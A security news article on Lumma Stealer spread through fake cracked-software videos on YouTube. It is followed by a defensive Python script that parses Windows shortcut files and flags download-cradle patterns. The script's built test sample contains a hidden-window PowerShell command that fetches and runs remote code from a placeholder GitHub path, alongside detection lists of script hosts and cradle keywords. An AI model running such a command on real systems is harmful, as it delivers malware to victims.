Threat actors are using YouTube channels as a platform to distribute a variant of the Lumma Stealer malware. The attackers are using deceptive videos with content related to cracked software to lure unsuspecting users into downloading malicious content.
The videos point viewers to installation guides containing malicious URLs, often shortened with services like TinyURL and Cuttly. To slip past simple web-filter blocklists, the threat actors abuse legitimate file-hosting platforms such as GitHub and MediaFire rather than standing up servers of their own.
Lumma Stealer is an information stealer known for harvesting sensitive data, including user credentials, system details, browser data, and browser extensions. Written in C, the malware has been advertised for sale on the dark web since 2022; numerous command-and-control (C2) servers have been observed in the wild, and it receives regular updates that extend its capabilities.
To avoid detection and analysis, the threat actors behind Lumma Stealer employ various obfuscation techniques.
The attack method, as detailed by FortiGuard Labs, involves compromising a YouTuber's account and uploading videos disguised as guides for installing cracked software.
In the most recent attacks observed by the researchers, the videos tried to get viewers to click links in the video descriptions. Those links led to a bogus installer hosted on MediaFire.
Unpacking the installer archive yields a Windows shortcut (LNK) disguised as a setup file. When run, the LNK fetches a .NET loader from a GitHub repository; the loader performs anti-virtual-machine and anti-debugging checks before loading the Lumma Stealer payload, so the final stage is withheld from sandboxes and analyst machines and only runs on hosts that look like real victims.
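The LNK stage of this chain is the one a defender can most easily triage offline, because a shortcut file carries its target and command-line arguments in plain sight. The script below is an added example written for this page, not code from the article or from FortiGuard Labs' report. It implements a minimal reader for the Shell Link binary format (the 76-byte header, skipping the optional LinkTargetIDList and LinkInfo structures, then the StringData fields) and applies heuristics for the pattern described above: a shortcut named like an installer that launches a script host to pull a second stage from a file-hosting site or through a URL shortener. The two sample shortcuts are constructed in the script itself, and the GitHub repository path inside the suspicious one is a hypothetical placeholder, not a real indicator; the domain and keyword lists are assumptions you would extend from your own telemetry.

```python
"""Triage Windows shortcut (.lnk) files for second-stage download indicators.

Minimal reader for the Shell Link binary format (MS-SHLLINK): parses the
76-byte header, skips the optional LinkTargetIDList and LinkInfo structures,
and extracts the StringData fields (name, relative path, working directory,
command-line arguments, icon location). The extracted target and arguments
are then matched against heuristics for a shortcut posing as a setup file
that launches a script host to fetch a loader from public file hosting.
"""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK section 2.1.1); only the low byte is needed here.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData structures appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Heuristic lists (assumptions for this example; extend from your own telemetry).
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "certutil", "bitsadmin")
HOSTING_DOMAINS = ("github.com", "githubusercontent.com", "mediafire.com")
SHORTENER_DOMAINS = ("tinyurl.com", "cutt.ly")
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer", re.I)
STEALTH_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-e(nc|ncodedcommand)?\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk as a dict; raise ValueError if it is not a Shell Link."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize field + IDList bytes
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize counts itself
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def triage(filename: str, fields: dict) -> list:
    """Heuristic findings for one shortcut; an empty list means nothing matched."""
    findings = []
    stem = filename.lower().removesuffix(".lnk")
    if re.search(r"setup|install|crack|keygen|patch", stem) or "." in stem:
        findings.append("shortcut named like an installer or carries a double extension")
    target = (fields.get("relative_path") or "").lower()
    args = fields.get("arguments") or ""
    if any(h in target or h in args.lower() for h in SCRIPT_HOSTS):
        findings.append("launches a script/command host")
    if CRADLE_RE.search(args):
        findings.append("contains a download cradle")
    if STEALTH_RE.search(args):
        findings.append("hides its window or uses encoded/no-profile flags")
    for url in URL_RE.findall(args):
        host = url.split("/")[2].lower().split(":")[0]
        if any(host == d or host.endswith("." + d) for d in HOSTING_DOMAINS):
            findings.append(f"fetches from public file hosting: {host}")
        elif any(host == d or host.endswith("." + d) for d in SHORTENER_DOMAINS):
            findings.append(f"fetches via URL shortener: {host}")
        else:
            findings.append(f"fetches from {host}")
    return findings


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed test input: a minimal well-formed Shell Link carrying only
    RELATIVE_PATH and COMMAND_LINE_ARGUMENTS. Not a real-world sample."""
    header = bytearray(LNK_HEADER_SIZE)
    struct.pack_into("<I", header, 0, LNK_HEADER_SIZE)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return bytes(header) + string_data(relative_path) + string_data(arguments)


# Constructed samples; the repository path is a hypothetical placeholder, not an indicator.
SUSPICIOUS_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/example-user/example-repo/main/loader.txt')\"",
)
BENIGN_LNK = build_sample_lnk(r"..\..\Windows\notepad.exe", r"%USERPROFILE%\readme.txt")

if __name__ == "__main__":
    for name, blob in (("Setup.exe.lnk", SUSPICIOUS_LNK), ("Notepad.lnk", BENIGN_LNK)):
        fields = parse_lnk(blob)
        print(name, "->", fields.get("relative_path"), fields.get("arguments"))
        for finding in triage(name, fields):
            print("  -", finding)
```

Run against a directory of extracted archive contents, the same `parse_lnk` and `triage` calls work on real shortcuts; the parser only reads the StringData, so a shortcut whose target lives solely in the LinkTargetIDList (no RELATIVE_PATH) yields an empty target and the heuristics then depend on the arguments alone.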